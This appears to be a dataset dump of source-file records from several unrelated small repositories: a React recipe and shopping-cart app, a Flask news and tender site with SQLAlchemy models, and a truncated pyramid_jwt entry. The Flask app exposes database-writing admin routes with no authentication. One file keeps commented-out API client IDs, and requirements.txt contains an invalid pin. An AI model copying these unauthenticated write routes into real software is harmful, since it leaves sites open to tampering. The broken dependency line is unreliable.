{
"alpha_fraction": 0.5751953125,
"alphanum_fraction": 0.5830078125,
"avg_line_length": 28.68115997314453,
"blob_id": "178ba6aa470164fb1469320b26f7744a321addd4",
"content_id": "f4684c03898d6ba7f66e9a10a835ff289c01d24f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2048,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 69,
"path": "/ui/src/ShoppingCart/ShoppingCart.js",
"repo_name": "therodesun/recipes.io",
"src_encoding": "UTF-8",
"text": "import React, { Component } from \"react\";\nimport { Image } from 'react-bootstrap';\nimport './ShoppingCart.css';\nimport Table from './RecipeTable2';\nimport IngredientsList from '../RecipePage/IngredientsList'\nimport axios from \"axios\"\n\nexport default class ShoppingCart extends Component {\n \n // get my recipes list and ingredients list\n componentDidMount() {\n var recipes;\n var ingredients;\n axios.get('http://localhost:5000/myrecipes')\n .then(res => {\n recipes = res.data.recipes_list;\n // responseRecipes prevents from rendering before recipe data is loaded\n this.setState({recipes: recipes, responseRecipes: true});\n })\n .catch(function (error) {\n //Not handling the error. Just logging into the console.\n console.log(error);\n });\n \n axios.get('http://localhost:5000/shopping')\n .then(res => {\n ingredients = res.data.ingredients;\n // responseIngredients prevents from rendering before ingredient data is loaded\n this.setState({ingredients: ingredients, responseIngredients: true});\n })\n .catch(function (error) {\n //Not handling the error. Just logging into the console.\n console.log(error);\n });\n }\n \n state = {\n recipes:[],\n ingredients:[],\n responseRecipes:false,\n responseIngredients:false\n }\n \n render() {\n const {ingredients, recipes} = this.state;\n console.log(this.state);\n return (\n <div className=\"ShoppingCart\">\n <div className=\"lander\">\n <span>\n <h1 id=\"title\">Shopping Cart</h1>\n </span>\n <span>\n <div id=\"ingredients2\">\n <h3 id=\"ingr_title\">Ingredients</h3>\n <IngredientsList recipeData={ingredients}/>\n </div>\n <div id=\"saved\">\n <h3 id=\"saved_title\">Saved Recipes</h3>\n <div id=\"tablediv\">\n <Table recipeData= {recipes} />\n </div>\n </div>\n </span>\n </div>\n </div>\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5725556015968323,
"alphanum_fraction": 0.5816399455070496,
"avg_line_length": 32.19841384887695,
"blob_id": "71d737004a6c2b08c0e500a74e2e0bccb22bf920",
"content_id": "701ff058722378b5cb3396ca3afd13d36f62b20a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 4183,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 126,
"path": "/ui/src/RecipePage/RecipePage.js",
"repo_name": "therodesun/recipes.io",
"src_encoding": "UTF-8",
"text": "import React, { Component } from \"react\";\nimport { Button, Image } from 'react-bootstrap';\nimport './RecipePage.css';\nimport { FontAwesomeIcon } from '@fortawesome/react-fontawesome';\nimport { faClock } from '@fortawesome/free-solid-svg-icons';\nimport IngredientsList from './IngredientsList';\nimport InstructionsList from './InstructionsList';\nimport axios from \"axios\";\n\n\nexport default class RecipePage extends Component {\n \n // getting recipe data\n componentDidMount() {\n axios.get('http://localhost:5000/recipe')\n .then(res => {\n const recipe = res.data;\n const ingredients = recipe.ingredients;\n const name = recipe.name;\n const steps = recipe.steps;\n const time = recipe.time;\n const imageURL = recipe.imageURL;\n this.setState({ ingredients: ingredients, name: name, steps: steps, time: time, imageURL: imageURL, response: true });\n })\n .catch(function (error) {\n //Not handling the error. Just logging into the console.\n console.log(error);\n });\n }\n\n state = {\n ingredients: [],\n steps: [],\n name: \"\",\n time: \"\",\n imageURL: \"\",\n response:false,\n }\n\n render() {\n // prevent page from loading prematurely\n if (!this.state.response){\n return <div id=\"loadingbar\">(Loading...)</div>\n }\n const {ingredients, steps, name, time, imageURL} = this.state;\n\n return (\n <div className=\"RecipePage\">\n <div className=\"lander\">\n <span>\n <h1 id=\"title\">{name}</h1>\n <Button variant=\"btn btn-success\" id=\"shopping\" onClick={() => {sendIngredients(ingredients, this.state)}}>Add to Shopping Cart</Button>\n <Button variant=\"btn btn-success\" id=\"editBtn\" onClick={() => {sendName(name)}}>Edit Recipe</Button>\n <Button variant=\"btn btn-success\" id=\"deleteBtn\" onClick={() => {deleteRecipe(name)}}>Delete Recipe</Button>\n </span>\n <span>\n <div id=\"ingredients\">\n <h3 id=\"ingr_title\">Ingredients</h3>\n <em id=\"timeamt\">{time}</em>\n <FontAwesomeIcon icon={faClock} id=\"timeicon\"/>\n <IngredientsList recipeData={ingredients}/>\n </div>\n <div id=\"right\">\n <img src={imageURL} id=\"image\"></img>\n </div>\n </span>\n <div id=\"instructions\">\n <h3 id=\"instr_title\">Instructions</h3>\n <InstructionsList recipeData={steps}/>\n </div>\n </div>\n </div>\n );\n }\n}\n\n// shopping cart function\nfunction sendIngredients(ingredients, recipe) {\n // add to user ingredient list\n axios.post('http://localhost:5000/shopping', {\"ingredients\":ingredients})\n .then(res => {\n console.log(\"success\");\n })\n .catch(function (error) {\n //Not handling the error. Just logging into the console.\n console.log(error);\n });\n \n // add to user recipe list\n axios.post('http://localhost:5000/myrecipes', recipe)\n .then(res => {\n console.log(\"success\");\n window.location.href = \"http://localhost:3000/ShoppingCart\";\n })\n .catch(function (error) {\n //Not handling the error. Just logging into the console.\n console.log(error);\n }); \n}\n\n// load recipe into cache for edit recipe\nfunction sendName(name) {\n const nameURL = encodeURIComponent(name);\n axios.get('http://localhost:5000/recipes/' + nameURL)\n .then(res => {\n console.log(\"success\");\n window.location.href = \"http://localhost:3000/EditRecipe\";\n })\n .catch(function (error) {\n //Not handling the error. Just logging into the console.\n console.log(error);\n });\n}\n\nfunction deleteRecipe(name) {\n const nameURL = encodeURIComponent(name);\n axios.delete('http://localhost:5000/recipes/' + nameURL)\n .then(res => {\n console.log(\"success\");\n window.location.href = \"http://localhost:3000/RecipeTable\";\n })\n .catch(function (error) {\n //Not handling the error. Just logging into the console.\n console.log(error);\n });\n}\n"
},
{
"alpha_fraction": 0.5584137439727783,
"alphanum_fraction": 0.5627009868621826,
"avg_line_length": 37.91666793823242,
"blob_id": "cbcd5cef294e8e3108a29789106dd096d716c3af",
"content_id": "e3f796cf09564424e97882f20149c7fcc99fa460",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 933,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 24,
"path": "/ui/src/components/Navbar.js",
"repo_name": "therodesun/recipes.io",
"src_encoding": "UTF-8",
"text": "import React from 'react';\nimport { Navbar, Nav } from 'react-bootstrap';\nimport { withRouter } from 'react-router-dom';\nimport './Navbar.css';\n\nconst Navigation = (props) => {\n console.log(props);\n return (\n <Navbar bg=\"primary\" variant=\"dark\">\n <Navbar.Brand href=\"/\" id=\"brand\">Reci.P</Navbar.Brand>\n <Navbar.Toggle aria-controls=\"basic-navbar-nav\" id=\"toggle\"/>\n <Navbar.Collapse id=\"basic-navbar-nav\">\n <Nav className=\"mr-auto\">\n <Nav.Link href=\"/\" id=\"link0\">Home</Nav.Link>\n <Nav.Link href=\"/RecipeTable\" id=\"link1\">Recipe Table</Nav.Link>\n <Nav.Link href=\"/ShoppingCart\" id=\"link3\">Shopping Cart</Nav.Link>\n <Nav.Link href=\"/AddRecipe\" id=\"link4\">Add Recipe</Nav.Link>\n </Nav>\n </Navbar.Collapse>\n </Navbar>\n )\n}\n\nexport default withRouter(Navigation);"
},
{
"alpha_fraction": 0.5300092101097107,
"alphanum_fraction": 0.5493997931480408,
"avg_line_length": 24.186046600341797,
"blob_id": "28bd248f2edc32593ca4d5a07053ab4060aa2a11",
"content_id": "15b53a15247bd0ea8e8dd8d3799c72c8ca0ed39a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1083,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 43,
"path": "/ui/src/image-uploading/uploader.js",
"repo_name": "therodesun/recipes.io",
"src_encoding": "UTF-8",
"text": "import React, { Component } from 'react'\nimport axios from 'axios';\n\n// const client_id = \"f4ca50bc021558a\" //\"ff3a3f659d1a390\"\n\nclass App extends Component {\n state = {\n selectedFile: null,\n url: null\n }\n\n selectFileHelper = event => {\n this.setState({selectedFile: event.target.files[0]});\n this.setState({url: URL.createObjectURL(event.target.files[0])});\n }\n\n uploadHelper = () => {\n /* Post call\n const fd = new FormData();\n fd.append(\"image\", this.state.selectedFile);\n const config = {\n headers: {\n Authorization: `Client-ID ${client_id}`,\n },\n };\n axios.post('https://api.imgur.com/3/upload', fd, config)\n .then(res => \n {console.log(res);\n }); */\n }\n\n render() {\n return (\n <div className=\"App\">\n <input type = \"file\" onChange={this.selectFileHelper}/>\n <img className = \"class\" src = {this.state.url} />\n <button onClick = {this.uploadHelper}>Upload</button>\n </div>\n )\n }\n}\n\nexport default App\n"
}
] | 16 |
techtutor-co/Prediccion_Ingresos
|
https://github.com/techtutor-co/Prediccion_Ingresos
|
74a2737a595a8318ab611332eb2c5a8ae78cea53
|
23ef501a10a10889e4812f88b5645c822a8d8b6e
|
575924330a4c0a382ed0bfff1665c8b70ecc3923
|
refs/heads/master
| 2022-02-25T02:16:49.442795 | 2019-08-31T23:19:37 | 2019-08-31T23:19:37 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6282051205635071,
"alphanum_fraction": 0.6304675936698914,
"avg_line_length": 33.02564239501953,
"blob_id": "10a3910ca3b94bf49f45e072876d6746154e5f95",
"content_id": "ed89d86508d06b9b8962c14759baba74fe5efab0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1326,
"license_type": "no_license",
"max_line_length": 143,
"num_lines": 39,
"path": "/train_model.py",
"repo_name": "techtutor-co/Prediccion_Ingresos",
"src_encoding": "UTF-8",
"text": "from ml_utils.data import DataUtils\nfrom ml_utils.model import ModelUtils\nimport json\nimport sys\nimport pandas as pd\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score, make_scorer\nimport warnings\n\nwarnings.filterwarnings('ignore')\n \ndef main():\n if len(sys.argv) == 2:\n with open(sys.argv[1]) as json_file:\n config_data = json.load(json_file)\n data_utils = DataUtils(config_data)\n model_utils = ModelUtils(config_data)\n\n data_utils.config_dataset()\n census_df = pd.read_csv(config_data['dataset_path'])\n \n data_utils.encode_categories(census_df, data_utils.get_cols_by_type(census_df, 'object'))\n features = census_df.drop(['income'], axis = 1)\n label = census_df[['income']]\n\n X_train, X_test, y_train, y_test = data_utils.split_dataset(features, label, config_data['random_state'], config_data['test_size'])\n\n learner = LogisticRegression()\n\n learner = model_utils.train_model(learner, X_train, y_train)\n score = model_utils.eval_model(learner, accuracy_score, X_test, y_test)\n\n print(f'score: {score}')\n\n model_utils.save_model(learner, config_data['model_path'])\n\n\nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.6150793433189392,
"alphanum_fraction": 0.6150793433189392,
"avg_line_length": 26.66666603088379,
"blob_id": "13f37ad59ed434e98b10b713c28807875a767bb4",
"content_id": "54609929b1767112abcf9a5f31389b01b5573fd0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 504,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 18,
"path": "/ml_utils/model.py",
"repo_name": "techtutor-co/Prediccion_Ingresos",
"src_encoding": "UTF-8",
"text": "\nclass ModelUtils:\n\n def __init__(self, config):\n return None\n\n def train_model(self, learner, X_train, y_train):\n return learner.fit(X_train, y_train)\n\n def eval_model(self, learner, scorer, X_test, y_test):\n predictions = learner.predict(X_test)\n return scorer(y_test, predictions)\n\n\n def save_model(self, model, model_filepath):\n import pickle\n # save the classifier\n pickle.dump(model, open(model_filepath, 'wb'))\n return True\n\n "
},
{
"alpha_fraction": 0.6740614175796509,
"alphanum_fraction": 0.6740614175796509,
"avg_line_length": 33.52941131591797,
"blob_id": "cfa7f11db97dc5335641b3b7b58c02c80aa30465",
"content_id": "07389238d8a3b4efa6423c9559a08759fac12ab5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 586,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 17,
"path": "/model_pipeline/dataset_preprosesor.py",
"repo_name": "techtutor-co/Prediccion_Ingresos",
"src_encoding": "UTF-8",
"text": "import json\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom ml_utils.data import DataUtils\n\nclass DatasetPreprocessor(BaseEstimator, TransformerMixin):\n\n def __init__(self, config_path):\n with open(config_path) as json_file:\n self._config_data = json.load(json_file)\n self._data_utils = DataUtils(self._config_data)\n\n def fit(self, X, y = None):\n return None\n\n def transform(self, X, y = None):\n categories = self._data_utils.get_cols_by_type(X, 'object')\n return self._data_utils.encode_categories(X, categories)"
},
{
"alpha_fraction": 0.6535685658454895,
"alphanum_fraction": 0.6535685658454895,
"avg_line_length": 38,
"blob_id": "bf77a77171396aa43f7f6cfffd299587d8e5c233",
"content_id": "b4a2a07e07177e79edb01df1a0e0dfa753615d20",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1247,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 32,
"path": "/ml_utils/data.py",
"repo_name": "techtutor-co/Prediccion_Ingresos",
"src_encoding": "UTF-8",
"text": "import pandas as pd \nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.model_selection import train_test_split\n\nclass DataUtils:\n\n def __init__(self, config):\n self._origin_path = config['origin_path']\n self._target_path = config['dataset_path']\n self._column_names = config['column_names']\n\n def config_dataset(self):\n census_df = pd.read_csv(self._origin_path, names = self._column_names)\n census_df.to_csv(self._target_path, index = False)\n\n def get_cols_by_type(self, df, type_name):\n types_df = df.dtypes.to_frame(name = 'dtypes')\n categorical = types_df[types_df['dtypes'] == type_name]\n return list(categorical.index)\n \n def encode_category(self, df, category):\n lbl_encoder = LabelEncoder()\n return lbl_encoder.fit_transform(df[category])\n \n def encode_categories(self, df, categories):\n for category in categories:\n df[category] = self.encode_category(df, category)\n\n def split_dataset(self, features, label, random_state, test_size): \n X_train, X_test, y_train, y_test = train_test_split(features, label, test_size=test_size, random_state=random_state)\n\n return X_train, X_test, y_train, y_test"
},
{
"alpha_fraction": 0.6548117399215698,
"alphanum_fraction": 0.6548117399215698,
"avg_line_length": 28.9375,
"blob_id": "19d0413d4b7de07347dbc2494b265e2586a27d48",
"content_id": "8b7483677290cafded719ea2314ba33119270a28",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 478,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 16,
"path": "/model_pipeline/model_builder.py",
"repo_name": "techtutor-co/Prediccion_Ingresos",
"src_encoding": "UTF-8",
"text": "import json\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom ml_utils.model import ModelUtils\n\nclass ModelBuilder(BaseEstimator, TransformerMixin):\n\n def __init__(self, config_path):\n with open(config_path) as json_file:\n self._config_data = json.load(json_file)\n self._model_utils = ModelUtils(self._config_data)\n \n def fit(self, X, y = None):\n return None\n \n def transform(self, X, y = None):\n return None"
},
{
"alpha_fraction": 0.6911764740943909,
"alphanum_fraction": 0.6911764740943909,
"avg_line_length": 17.545454025268555,
"blob_id": "a61ddc7b3c1fb491ad292bbeda23e244f33510f0",
"content_id": "59f77b94ec8037c901dd83421c66709191be8130",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 204,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 11,
"path": "/model_pipeline/training_pipeline.py",
"repo_name": "techtutor-co/Prediccion_Ingresos",
"src_encoding": "UTF-8",
"text": "from sklearn.pipeline import Pipeline\nfrom ml_utils.data import DataUtils\n\nclass TraininigPipeline:\n\n def __init__(self, params):\n\n return None\n\n def fit_transform(self):\n return None\n"
},
{
"alpha_fraction": 0.6313320994377136,
"alphanum_fraction": 0.6341463327407837,
"avg_line_length": 31.33333396911621,
"blob_id": "8b39df8408cbb5ee50966a8966a9b78d4652e9c2",
"content_id": "a67c8ebddd596fc8b3c7cadee31e7ff44326f7a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1066,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 33,
"path": "/run_model.py",
"repo_name": "techtutor-co/Prediccion_Ingresos",
"src_encoding": "UTF-8",
"text": "from ml_utils.data import DataUtils\nfrom ml_utils.model import ModelUtils\nimport json\nimport sys\nimport pandas as pd\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score, make_scorer\nimport warnings\nimport joblib\n\nwarnings.filterwarnings('ignore')\n\ndef main():\n if len(sys.argv) == 2:\n with open(sys.argv[1]) as json_file:\n config_data = json.load(json_file)\n data_utils = DataUtils(config_data)\n model_utils = ModelUtils(config_data)\n data_utils.config_dataset()\n census_df = pd.read_csv(config_data['dataset_path'])\n\n data_utils.encode_categories(census_df, data_utils.get_cols_by_type(census_df, 'object'))\n features = census_df.drop(['income'], axis = 1)\n label = census_df[['income']]\n\n learner = joblib.load(config_data['model_path'])\n score = model_utils.eval_model(learner, accuracy_score, features, label)\n \n print(f'score: {score}')\n\n\nif __name__ == \"__main__\":\n main()"
}
] | 7 |
IqraJunaid/eccbc
|
https://github.com/IqraJunaid/eccbc
|
8d5e8d2e634e289d69891fe1377fc0ea71b98df8
|
e8c25c49b223234d8c2225d2613903fdda05ca32
|
f01284a188185cc06ee993f66e78668a7e320c84
|
refs/heads/master
| 2020-03-29T09:25:38.405284 | 2018-09-27T12:30:36 | 2018-09-27T12:30:36 | 149,757,826 | 2 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.8482490181922913,
"alphanum_fraction": 0.8482490181922913,
"avg_line_length": 50.400001525878906,
"blob_id": "380696c0b61d45e70123f88c9a46b335a1df6a67",
"content_id": "9c3c9e5cf850683b9577719bf81aadc56363dc7a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 257,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 5,
"path": "/README.md",
"repo_name": "IqraJunaid/eccbc",
"src_encoding": "UTF-8",
"text": "To better understand the growth and impact of Bitcoin and other cryptocurrencies I will, in this project, explore the market \ncapitalization of different cryptocurrencies using:\npandas Foundations\nManipulating DataFrames with pandas\nCleaning Data in Python\n"
},
{
"alpha_fraction": 0.6912040114402771,
"alphanum_fraction": 0.7138698101043701,
"avg_line_length": 25.84357452392578,
"blob_id": "3f99c265e1f12170aecd8a05b82f726df61d537e",
"content_id": "6128a09725a05976819ceb91650a044677191265",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4809,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 179,
"path": "/crypto_notebook.py",
"repo_name": "IqraJunaid/eccbc",
"src_encoding": "UTF-8",
"text": "\n\n\n#Project By: Iqra Junaid\n\n\n# Importing pandas\nimport pandas as pd\n\n# Importing matplotlib and setting aesthetics for plotting later.\nimport matplotlib.pyplot as plt\nget_ipython().run_line_magic('matplotlib', 'inline')\nget_ipython().run_line_magic('config', \"InlineBackend.figure_format = 'svg'\")\nplt.style.use('fivethirtyeight')\n\n# Reading in current data from coinmarketcap.com\ncurrent = pd.read_json(\"https://api.coinmarketcap.com/v1/ticker/\")\n\n# Printing out the first few lines\ncurrent.head()\n\n\n# In[2]:\n\n\n# Reading datasets/coinmarketcap_06122017.csv into pandas\ndec6 = pd.read_json(\"https://api.coinmarketcap.com/v1/ticker/?limit=0\")\n\n# Selecting the 'id' and the 'market_cap_usd' columns\nmarket_cap_raw = dec6.loc[:, [\"id\", \"market_cap_usd\"]]\n\n# Counting the number of values\nmarket_cap_raw.count()\n\n\n# In[3]:\n\n\n# Filtering out rows without a market capitalization\ncap = market_cap_raw.query('market_cap_usd > 0')\n\n# Counting the number of values again\ncap.count()\n\n\n# In[4]:\n\n\n#Declaring these now for later use in the plots\nTOP_CAP_TITLE = 'Top 10 market capitalization'\nTOP_CAP_YLABEL = '% of total cap'\n\n# Selecting the first 10 rows and setting the index\ncap10 = cap.head(10).set_index(\"id\")\n\n# Calculating market_cap_perc\ncap10 = cap10.assign(market_cap_perc = lambda x: (x.market_cap_usd/cap.market_cap_usd.sum()) * 100)\n\n# Plotting the barplot with the title defined above \nax = cap10.market_cap_perc.head(10).plot.bar(title=TOP_CAP_TITLE)\n\n# Annotating the y axis with the label defined above\nax.set_ylabel(TOP_CAP_YLABEL)\n\n\n# In[5]:\n\n\n# Colors for the bar plot\nCOLORS = ['orange', 'green', 'blue', 'cyan', 'red', 'black', 'silver', 'yellow', 'pink', 'violet']\n\n# Plotting market_cap_usd as before but adding the colors and scaling the y-axis \nax = cap10.market_cap_usd.head(10).plot.bar(title=TOP_CAP_TITLE, colors=COLORS)\nax.set_yscale('log')\n\n# Annotating the y axis with 'USD'\nax.set_ylabel('USD')\n\n# Final touch! Removing the xlabel as it is not very informative\nax.set_xlabel('')\n\n\n# In[6]:\n\n\n# Selecting the id, percent_change_24h and percent_change_7d columns\nvolatility = dec6.loc[:,[\"id\", \"percent_change_24h\", \"percent_change_7d\"]]\n\n# Setting the index to 'id' and dropping all NaN rows\nvolatility = volatility.set_index('id').dropna()\n\n# Sorting the DataFrame by percent_change_24h in ascending order\nvolatility = volatility.sort_values(by='percent_change_24h', ascending=True)\n\n# Checking the first few rows\nvolatility.head()\n\n\n# In[7]:\n\n\n#Defining a function with 2 parameters, the series to plot and the title\ndef top10_subplot(volatility_series, title):\n # Making the subplot and the figure for two side by side plots\n fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(10, 6))\n \n # Plotting with pandas the barchart for the top 10 losers\n volatility_series[:10].plot.bar(ax=axes[0], color='purple')\n \n # Setting the figure's main title to the text passed as parameter\n fig.suptitle(title)\n \n # Setting the ylabel to '% change'\n ax.set_ylabel('% change')\n \n # Same as above, but for the top 10 winners\n volatility_series[-10:].plot.bar(ax=axes[1], color='pink')\n \n # Returning this for good practice, might use later\n return fig, ax\n\nDTITLE = \"24 hours top losers and winners\"\n\n# Calling the function above with the 24 hours period series and title DTITLE \nfig, ax = top10_subplot(volatility.percent_change_24h, DTITLE)\n\n\n# In[8]:\n\n\n# Sorting in ascending order\nvolatility7d = volatility.sort_values(by='percent_change_7d', ascending=True)\n\nWTITLE = \"Weekly top losers and winners\"\n\n# Calling the top10_subplot function\nfig, ax = top10_subplot(volatility7d.percent_change_7d, WTITLE)\n\n\n# In[9]:\n\n\n# Selecting everything bigger than 10 billion \nlargecaps = market_cap_raw.query('market_cap_usd > 1e+10')\n\n# Printing out largecaps\nprint(largecaps)\n\n\n# In[10]:\n\n\n# Making a nice function for counting different marketcaps from the\n# \"cap\" DataFrame. Returns an int.\n# INSTRUCTORS NOTE: Since you made it to the end, consider it a gift :D\ndef capcount(query_string):\n return cap.query(query_string).count().id\n\n# Labels for the plot\nLABELS = [\"biggish\", \"micro\", \"nano\"]\n\n# Using capcount count the biggish cryptos\nbiggish = capcount('market_cap_usd > 3e+8')\n\n# Same as above for micro ...\nmicro = capcount('market_cap_usd > 5e+7 and market_cap_usd < 3e+8')\n\n# ... and for nano\nnano = capcount('market_cap_usd < 5e+7')\n\n# Making a list with the 3 counts\nvalues = [biggish, micro, nano]\n\n# Plotting them with matplotlib \nfig, ax = plt.subplots()\nnano_plt, micro_plt, biggish_plt = plt.bar([0, 1, 2], values, tick_label=LABELS)\nnano_plt.set_facecolor('salmon')\nmicro_plt.set_facecolor('pink')\nbiggish_plt.set_facecolor('purple')\nax.set_ylabel('Number of coins')\nax.set_title('Classification of coins by market cap')\nplt.show()\n\n"
}
] | 2 |
vkbinfo/vishalsemari
|
https://github.com/vkbinfo/vishalsemari
|
7d8306ad4d6a0d1fb069c009c3e40dfd176af087
|
3c4a9427fd9ea4f947f1d681234de8b149cf5e2e
|
6a91371c3635793273fd316ff9a1c1cab024fa94
|
refs/heads/master
| 2021-01-01T06:12:55.054925 | 2019-03-01T21:29:00 | 2019-03-01T21:29:00 | 97,380,623 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6312763690948486,
"alphanum_fraction": 0.6354925036430359,
"avg_line_length": 27.988889694213867,
"blob_id": "b2cf53e0932a6778a46c889451be3b38636c1ace",
"content_id": "1bef4e58913d7aa462f0f668ff4d26e8d170c122",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2609,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 90,
"path": "/app.py",
"repo_name": "vkbinfo/vishalsemari",
"src_encoding": "UTF-8",
"text": "from sqlalchemy import create_engine\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom database_setup import Base, News, Tender, Headlines\n\n# bind our database to a engine that we can perform operation.\nengine = create_engine('sqlite:///semari.db')\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\n\nfrom flask import Flask, render_template, redirect, request, url_for, flash\n\napp = Flask(__name__)\n\n\[email protected](\"/\")\ndef index():\n session = DBSession()\n newsCursor = session.query(News).order_by(News.id.desc()).limit(6).all()\n tenderCursor = session.query(Tender).order_by(Tender.id.desc()).limit(4).all()\n headlinesCursor = session.query(Headlines).order_by(Headlines.id.desc()).limit(4).all()\n session.close()\n return render_template('index.html', news=newsCursor, tender=tenderCursor, headlines=headlinesCursor)\n\n\[email protected](\"/about\")\ndef about():\n return render_template(\"about.html\")\n\n\[email protected](\"/schemes\")\ndef scheme():\n return render_template(\"schemes.html\")\n\n\[email protected](\"/rules\")\ndef rules():\n return render_template(\"rules.html\")\n\n\[email protected](\"/admin\")\ndef admin():\n return render_template(\"admin.html\")\n\n\[email protected](\"/news\")\ndef news():\n return render_template(\"post.html\", data=\"news\")\n\n\[email protected](\"/tender\")\ndef tender():\n return render_template(\"post.html\", data=\"tender\")\n\n\[email protected](\"/headlines\")\ndef headlines():\n return render_template(\"post.html\", data=\"headlines\")\n\n\[email protected](\"/dbentry\", methods=[\"GET\", \"POST\"])\ndef dbentry():\n if (request.method == \"POST\"):\n if request.form['datatype'] == 'news':\n session = DBSession()\n newsObj = News(link=request.form['link'], post=request.form['post'])\n session.add(newsObj)\n session.commit()\n session.close()\n return redirect(url_for(\"index\"))\n if request.form['datatype'] == 'tender':\n session = DBSession()\n tenderObj = Tender(link=request.form['link'], post=request.form['post'])\n session.add(tenderObj)\n session.commit()\n session.close()\n return redirect(url_for(\"index\"))\n if request.form['datatype'] == 'headlines':\n session = DBSession()\n headObj = Headlines(link=request.form['link'], post=request.form['post'])\n session.add(headObj)\n session.commit()\n session.close()\n return redirect(url_for(\"index\"))\n else:\n return render_template(\"dbentry\")\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5000)\n"
},
{
"alpha_fraction": 0.6950052976608276,
"alphanum_fraction": 0.7141339182853699,
"avg_line_length": 24.432432174682617,
"blob_id": "f6a08d8c5f6479d5dc9c49a4882f36af14f0dfb9",
"content_id": "b4240b6dc5a8b112b40bf4f46841b0071895e88c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 941,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 37,
"path": "/database_setup.py",
"repo_name": "vkbinfo/vishalsemari",
"src_encoding": "UTF-8",
"text": "# sqlalchemy configuration start same for every app\n\nfrom sqlalchemy import Column, Integer, String\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import create_engine\n\nBase = declarative_base()\n\n\n# configuration complete the above code is bascially required for every sqlalchemy app\n\nclass News(Base):\n __tablename__ = \"news\"\n id = Column(Integer, primary_key=True)\n link = Column(String(500))\n post = Column(String(100), nullable=False)\n\n\nclass Tender(Base):\n __tablename__ = \"tender\"\n id = Column(Integer, primary_key=True)\n link = Column(String(500))\n post = Column(String(100), nullable=False)\n\n\nclass Headlines(Base):\n __tablename__ = \"headlines\"\n id = Column(Integer, primary_key=True)\n link = Column(String(500))\n post = Column(String(100), nullable=False)\n\n\n# initialize database and table\n\nengine = create_engine('sqlite:///semari.db')\n\nBase.metadata.create_all(engine)\n"
},
{
"alpha_fraction": 0.5636363625526428,
"alphanum_fraction": 0.7090908885002136,
"avg_line_length": 17.33333396911621,
"blob_id": "4cd18b21a9a3f3d2983e8f8d1723e09a99b6d266",
"content_id": "c5ddf8b0a4193f2e8137aaeb26c20a1a817695cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 55,
"license_type": "no_license",
"max_line_length": 20,
"num_lines": 3,
"path": "/requirements.txt",
"repo_name": "vkbinfo/vishalsemari",
"src_encoding": "UTF-8",
"text": "Flask==0.12.2\nSQLAlchemy==1.2.0b1\nsqlite-devel==\"what\"\n"
}
] | 3 |
tripsolutions/pyramid_jwt
|
https://github.com/tripsolutions/pyramid_jwt
|
ff9ae8cb2e61f6fde498842ecc0d7be43a58a3d1
|
320ed080216971467ae5e12b1f9888b50a9a29b7
|
cf4796b4dd90b71df2274f2f7e55c94a2ba24a5a
|
refs/heads/master
| 2023-03-21T12:49:17.694838 | 2021-03-11T09:25:19 | 2021-03-11T09:25:19 | 343,829,429 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6791045069694519,
"alphanum_fraction": 0.6857060790061951,
"avg_line_length": 28.277311325073242,
"blob_id": "6f6a408302068403a6993d3d7e48586392fa382d",
"content_id": "f7199764cac1f3e56cc1b5f43ff6f14fb40c8601",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3484,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 119,
"path": "/tests/test_cookies.py",
